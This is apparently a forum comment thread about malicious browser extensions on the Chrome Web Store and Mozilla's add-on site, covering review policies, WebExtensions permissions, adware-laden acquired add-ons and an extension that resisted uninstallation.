Google deletes them fairly quickly, at least the couple of times I heard of these things or removed them from friends'/colleagues' computers they were already gone from the Chrome Web Store. That Mozilla bug you linked in another comment reads like an awfully misguided application of policy.
One of these extensions I came across automatically closed about:extensions every time I opened it to prevent uninstallation. Eventually went through the chrome task manager, killing extensions one by one until I found the right one by trial and error. Very frustrating to debug.
I don't think it's sleazy, while Mozilla does review all add-ons, it's hard to restrict what an extension right now since they can access internal APIs and there isn't really a permission system to speak of.
Additionally, JS is a dynamic language so it's difficult to provide adequate automated scanning for malicious intent. Even so, extension authors can be quite clever in how they hide malicious behavior, especially if there's financial reward involved.
WebExtensions (https://wiki.mozilla.org/WebExtensions) add a permission system, have a much smaller attack surface, and should help to alleviate this problem. This combined with automated scanning + human review and
Uhm, Mozilla does a code review of every extension or update to an extension before it gets published on AMO, so it should hardly be possible for a malicious third party to do malicious things...
There's an outfit called WIPS which buys up abandoned Firefox add-ons and puts adware and spyware in them.[1] BlockSite [2] is an example. This was approved by Mozilla AMO.[3]
It's a hard problem as many extensions do the equivalent of loading in a script from a remote site as part of their start -up process (consider an adblocker that regularly pulls down and updates list of ad definitions).
You could imagine that a malicious company would put through a "clean" version for testing and then once approved swap the script for the one loading malware.
